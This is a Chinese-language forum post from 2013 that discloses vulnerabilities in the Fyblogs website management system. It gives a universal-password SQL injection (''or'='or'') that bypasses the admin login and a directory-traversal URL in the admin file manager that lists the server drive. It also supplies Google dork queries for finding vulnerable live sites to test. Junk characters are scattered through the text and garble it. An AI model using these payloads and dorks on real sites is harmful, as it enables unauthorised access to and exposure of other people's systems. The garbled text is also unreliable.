漏洞类型: 未授权访问/权限绕过+ z/ i0 `5 N a7 a- M# a' \
) P- [( N9 e- D* D( L" y& z简要描述:
% `3 a, y: `/ @ u2 R+ I9 J5 I# P# l/ m' G, o H
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
5 O) @% I# I! [1 j) v# u) D, X' l7 d% C4 c/ b2 ?, ]
详细说明:0 Q( ^, @; a. o. v) K/ J3 n4 s
; s$ A3 Y( n! T* r; g: L) `: D
后台万能密码 'or'='or'; J/ f- f* q' J9 I
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
b! x6 y- D o* X. r( Q3 jadmin/uploadfile.asp?currentFolder=/upfiles/../
- D, ~, g, `; T; u; W* j
5 T4 S) Q; E2 O) `) ?+ [+ E8 F漏洞证明:
/ F* ~# a5 V) ?* ] R6 N, E, N2 l/ n
( G9 [& ~6 S5 d: v8 {" y谷歌:inurl:type.asp?id=1 新闻中心1 u8 P; H% A: v9 f0 \. L
或者 :inurl:download_ok.asp?5 q' s+ P- g# `+ y
& c' g3 [9 W9 C3 D
可以测试$ I) I& \; W2 ^2 P* m: v
# c( q, i E7 T% Z4 r+ \( w" W; o# B& w) I! _ q. q
|
发表于 2013-3-7 13:07:46
收藏
支持
反对